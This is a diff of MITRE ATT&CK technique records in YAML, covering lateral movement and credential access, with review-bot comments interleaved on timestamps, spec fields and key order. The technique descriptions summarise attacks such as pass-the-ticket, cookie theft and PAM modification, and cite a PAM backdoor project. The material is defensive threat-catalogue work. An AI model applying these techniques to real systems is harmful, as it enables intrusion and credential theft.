- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
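Review bot: the reference rewrite for T1021.005 drops the `Attacking VNC Servers PentestLab` and `Havana authentication bug` entries, but the technique description is not touched in this hunk, so check that the text no longer contains `(Citation: Attacking VNC Servers PentestLab)` or `(Citation: Havana authentication bug)`; an orphaned citation key renders as literal text on the technique page. Also, the new RFC 6143 entry carries a doubled period in `T. Richardson, J. Levine, RealVNC Ltd.. (2011, March)`; if that mirrors the upstream STIX data it should stay as-is, otherwise fix the author string.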
@@ -41944,11 +42632,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -41971,9 +42659,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -42024,7 +42711,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -42088,7 +42774,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -42159,7 +42844,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -42196,7 +42880,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
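Review bot: the `modified` timestamp for T1563.001 moves backwards, from `'2021-04-29T14:49:39.188Z'` to `'2020-03-23T23:11:24.682Z'`, while every other technique in this patch moves forward to 2024. An older timestamp usually means the generator picked up a stale or superseded STIX object for this technique, so confirm which upstream object it was built from before merging.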
@@ -42227,8 +42911,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
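Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1563.001 without adding `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref`, which the rest of the patch adds or keeps for every other technique. After this change the object has no attack spec version at all, which is consistent with the stale-object suspicion from the previous hunk; either regenerate from the current upstream object or add the two fields.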
@@ -42311,12 +42993,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -42343,6 +43024,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42360,12 +43042,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -42391,14 +43073,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -42516,7 +43197,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -42570,11 +43250,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42626,14 +43305,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -42719,12 +43397,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42744,6 +43421,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42751,7 +43429,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42767,39 +43444,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42824,12 +43502,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42843,13 +43520,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -42866,7 +43542,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42914,7 +43590,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -42947,7 +43623,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -42986,7 +43661,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
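Review bot: same backwards-timestamp pattern as T1563.001: T1210's `modified` goes from `'2022-05-11T14:00:00.188Z'` to `'2022-02-24T15:06:46.006Z'`. Verify the source object for this technique as well.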
@@ -43020,12 +43695,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
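Review bot: T1210 also loses `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no 3.2.0 replacement, leaving it without an attack spec version while neighbouring techniques gain 3.2.0. Treat it together with the T1563.001 case; the two should be fixed the same way.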
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43053,10 +43726,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -43086,7 +43758,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -43148,12 +43819,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43177,11 +43847,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -43206,9 +43875,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -43268,7 +43936,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -43323,7 +43990,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -43391,12 +44057,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -43453,6 +44118,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43463,13 +44129,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -43528,7 +44193,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43622,49 +44286,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
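Review bot: the description context lines at the end of this hunk show the `|-` block scalar split mid-sentence (`pam_unix.so`, then `, which retrieves`, then `/etc/passwd`, then `and /etc/shadow`, then `.(Citation: Apple PAM)`). Because `|-` preserves line breaks, the rendered description will contain newlines before the comma, the conjunction and the period. This is pre-existing rather than introduced here, but since the whole T1556.003 object is being regenerated it is worth confirming the generator is not inserting those breaks around inline-code spans. The removal of the `external_references` block at the top of this hunk is pure reordering; the same entries are re-added in the next hunk, so no reference is lost.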
@@ -43679,20 +44304,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
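Review bot: apart from the reordering, this hunk drops `x_mitre_permissions_required:` / `- root` from T1556.003 and does not reinstate it anywhere in the regenerated object. If the upstream ATT&CK object removed that field this is correct, but it is the one content removal hidden inside an otherwise key-order-only diff, so either call it out in the commit message or verify it against the source.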
@@ -43772,12 +44434,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43806,6 +44467,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
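Review bot: for T1110.001 `x_mitre_attack_spec_version: 3.2.0` is inserted right after `kill_chain_phases`, and the later hunk for this technique removes it (together with `x_mitre_modified_by_ref`) from after `object_marking_refs`, where every other technique in this patch keeps it; T1550.003 in the same patch moves `x_mitre_modified_by_ref` in the opposite direction. The YAML is equivalent, but the inconsistent key order will show up as churn on the next regeneration, so emit these keys in one stable position across objects.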
@@ -43817,18 +44479,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43855,14 +44517,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43986,12 +44645,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
